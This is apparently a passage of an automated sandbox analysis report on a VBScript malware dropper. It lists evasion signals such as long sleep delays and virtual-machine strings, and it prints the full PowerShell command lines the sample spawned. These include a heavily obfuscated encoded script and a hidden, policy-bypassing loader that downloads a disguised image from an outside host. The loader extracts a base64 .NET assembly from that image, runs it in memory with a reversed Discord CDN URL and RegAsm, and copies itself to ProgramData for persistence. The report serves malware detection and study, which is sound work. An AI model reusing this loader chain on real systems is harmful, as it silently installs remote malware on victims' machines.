        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1142Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2120Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4222Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5558Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1719Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1385Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep count: 4222 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep count: 5558 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208Thread sleep time: -19369081277395017s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep count: 1719 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep count: 1385 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: wscript.exe, 00000000.00000003.2029725990.0000021F65FB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
        Source: wscript.exe, 00000000.00000002.2034976437.0000021F66024000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2029725990.0000021F66024000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F66024000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000000.00000003.2029725990.0000021F65FB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW-Gf
        Source: wscript.exe, 00000000.00000002.2035139367.0000021F66032000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: wscript.exe, 00000000.00000002.2035139367.0000021F66032000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.97.3 443Jump to behavior
        Source: Yara matchFile source: amsi64_1360.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4952, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1360, type: MEMORYSTR
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbsJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhd
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'c:\programdata\' , 'cognitivo','regasm',''))} }"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgt